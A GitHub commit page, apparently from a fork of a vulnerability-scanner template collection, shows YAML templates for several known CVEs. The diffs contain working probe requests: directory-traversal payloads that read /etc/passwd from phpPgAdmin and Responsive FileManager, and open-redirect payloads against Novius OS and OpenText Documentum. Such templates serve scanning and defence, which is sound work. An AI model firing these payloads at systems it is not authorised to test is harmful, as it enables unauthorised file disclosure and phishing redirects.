-
Notifications
You must be signed in to change notification settings - Fork 272
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
1 parent
2eb80d1
commit 6f9452e
Showing
29 changed files
with
503 additions
and
600 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1 +1 @@ | ||
20240825 | ||
20240826 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1,28 +1,27 @@ | ||
id: CVE-2008-5587 | ||
|
||
info: | ||
name: phpPgAdmin 4.2.1 - '_language' Local File Inclusion | ||
author: dhiyaneshDK | ||
severity: medium | ||
description: Directory traversal vulnerability in libraries/lib.inc.php in phpPgAdmin 4.2.1 and earlier, when register_globals is enabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the _language parameter to index.php. | ||
reference: | ||
- https://www.exploit-db.com/exploits/7363 | ||
- http://web.archive.org/web/20210121184707/https://www.securityfocus.com/bid/32670/ | ||
- http://web.archive.org/web/20160520063306/http://secunia.com/advisories/33014 | ||
- http://web.archive.org/web/20151104173853/http://secunia.com/advisories/33263 | ||
classification: | ||
cve-id: CVE-2008-5587 | ||
reference: https://www.exploit-db.com/exploits/7363 | ||
|
||
metadata: | ||
shodan-query: http.title:"phpPgAdmin" | ||
tags: cve,cve2008,lfi,phppgadmin | ||
shodan-query: 'http.title:"phpPgAdmin"' | ||
description: "Directory traversal vulnerability in libraries/lib.inc.php in phpPgAdmin 4.2.1 and earlier, when register_globals is enabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the _language parameter to index.php." | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- '{{BaseURL}}/phpPgAdmin/index.php?_language=../../../../../../../../etc/passwd%00' | ||
|
||
matchers-condition: and | ||
matchers: | ||
|
||
- type: regex | ||
regex: | ||
- "root:[x*]:0:0" | ||
|
||
- type: status | ||
status: | ||
- 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1,26 +1,31 @@ | ||
id: CVE-2015-5354 | ||
|
||
info: | ||
name: Novius OS 5.0.1-elche - Open Redirect | ||
author: 0x_Akoko | ||
severity: medium | ||
description: Open redirect vulnerability in Novius OS 5.0.1 (Elche) allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the redirect parameter to admin/nos/login. | ||
description: Novius OS 5.0.1 (Elche) allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the redirect parameter to admin/nos/login. | ||
reference: | ||
- https://packetstormsecurity.com/files/132478/Novius-OS-5.0.1-elche-XSS-LFI-Open-Redirect.html | ||
- https://vuldb.com/?id.76181 | ||
- https://nvd.nist.gov/vuln/detail/CVE-2015-5354 | ||
- http://packetstormsecurity.com/files/132478/Novius-OS-5.0.1-elche-XSS-LFI-Open-Redirect.html | ||
- https://nvd.nist.gov/vul n/detail/CVE-2015-5354 | ||
classification: | ||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N | ||
cvss-score: 6.1 | ||
cve-id: CVE-2015-5354 | ||
cwe-id: CWE-601 | ||
tags: cve,cve2015,redirect,novius | ||
tags: packetstorm,cve,cve2015,redirect,novius | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- '{{BaseURL}}/novius-os/admin/nos/login?redirect=http://interact.sh' | ||
|
||
matchers: | ||
- type: regex | ||
part: header | ||
regex: | ||
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 | ||
|
||
# Enhanced by mp on 2022/07/22 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1,43 +1,25 @@ | ||
id: CVE-2017-14524 | ||
|
||
info: | ||
name: OpenText Documentum Administrator 7.2.0180.0055 - Open Redirect | ||
name: OpenText Documentum Administrator 7.2.0180.0055 - Open redirect | ||
author: 0x_Akoko | ||
severity: medium | ||
description: | | ||
OpenText Documentum Administrator 7.2.0180.0055 is susceptible to multiple open redirect vulnerabilities. An attacker can redirect a user to a malicious site and potentially obtain sensitive information, modify data, and/or execute unauthorized operations. | ||
impact: | | ||
An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the download of malware. | ||
remediation: | | ||
Apply the latest security patches or upgrade to a patched version of OpenText Documentum Administrator. | ||
severity: low | ||
description: Multiple open redirect vulnerabilities in OpenText Documentum Administrator 7.2.0180.0055 allow remote attackers to redirect users to arbitrary web sites and conduct phishing attacks. | ||
reference: | ||
- https://seclists.org/fulldisclosure/2017/Sep/57 | ||
- https://knowledge.opentext.com/knowledge/llisapi.dll/Open/68982774 | ||
- https://nvd.nist.gov/vuln/detail/CVE-2017-14524 | ||
- http://seclists.org/fulldisclosure/2017/Sep/57 | ||
- https://github.com/ARPSyndicate/cvemon | ||
- https://www.cvedetails.com/cve/CVE-2017-14524 | ||
- https://vuldb.com/?id.107201 | ||
tags: cve,cve2017,redirect,opentext | ||
classification: | ||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N | ||
cvss-score: 6.1 | ||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N | ||
cvss-score: 6.10 | ||
cve-id: CVE-2017-14524 | ||
cwe-id: CWE-601 | ||
epss-score: 0.00258 | ||
epss-percentile: 0.6357 | ||
cpe: cpe:2.3:a:opentext:documentum_administrator:7.2.0180.0055:*:*:*:*:*:*:* | ||
metadata: | ||
max-request: 1 | ||
vendor: opentext | ||
product: documentum_administrator | ||
tags: cve2017,cve,redirect,opentext,seclists | ||
|
||
http: | ||
requests: | ||
- method: GET | ||
path: | ||
- '{{BaseURL}}/xda/help/en/default.htm?startat=//oast.me' | ||
|
||
- '{{BaseURL}}/xda/help/en/default.htm?startat=//example.com' | ||
matchers: | ||
- type: regex | ||
part: header | ||
regex: | ||
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?oast\.me(?:\s*?)$' | ||
# digest: 4b0a00483046022100b32892e1ac671729ba982d52eb2d13b0e91ddae6c90c6b945a64e664d066cdb9022100eb9538968f1f58b108976f27fc2fa9ed8990673db1a2e1e1611c8fa3cfb12b8a:922c64590222798bb761d5b6d8e72950 | ||
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$' | ||
part: header |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1,32 +1,31 @@ | ||
id: CVE-2018-15535 | ||
|
||
info: | ||
name: Responsive FileManager < 9.13.4 - Directory Traversal | ||
name: Responsive FileManager <9.13.4 - Local File Inclusion | ||
author: daffainfo | ||
severity: high | ||
description: filemanager/ajax_calls.php in tecrail Responsive FileManager before 9.13.4 uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize get_file sequences such as ".." that can resolve to a location that is outside of that directory, aka Directory Traversal. | ||
description: Responsive FileManager before version 9.13.4 is susceptible to local file inclusion via filemanager/ajax_calls.php because it uses external input to construct a pathname that should be within a restricted directory. Instead, because it does not properly neutralize get_file sequences such as ".." can resolve to a location that is outside of that directory, aka local file inclusion. | ||
reference: | ||
- https://www.exploit-db.com/exploits/45271 | ||
- https://www.cvedetails.com/cve/CVE-2018-15535 | ||
|
||
- https://nvd.nist.gov/vuln/detail/CVE-2018-15535 | ||
- http://seclists.org/fulldisclosure/2018/Aug/34 | ||
- https://www.exploit-db.com/exploits/45271/ | ||
classification: | ||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N | ||
cvss-score: 7.50 | ||
cvss-score: 7.5 | ||
cve-id: CVE-2018-15535 | ||
cwe-id: CWE-22 | ||
|
||
tags: cve,cve2018,lfi | ||
requests: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}/filemanager/ajax_calls.php?action=get_file&sub_action=preview&preview_mode=text&title=source&file=../../../../etc/passwd" | ||
|
||
matchers-condition: and | ||
matchers: | ||
|
||
- type: regex | ||
regex: | ||
- "root:.*:0:0" | ||
|
||
- "root:.*:0:0:" | ||
- type: status | ||
status: | ||
- 200 | ||
|
||
# Enhanced by mp on 2022/07/07 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Oops, something went wrong.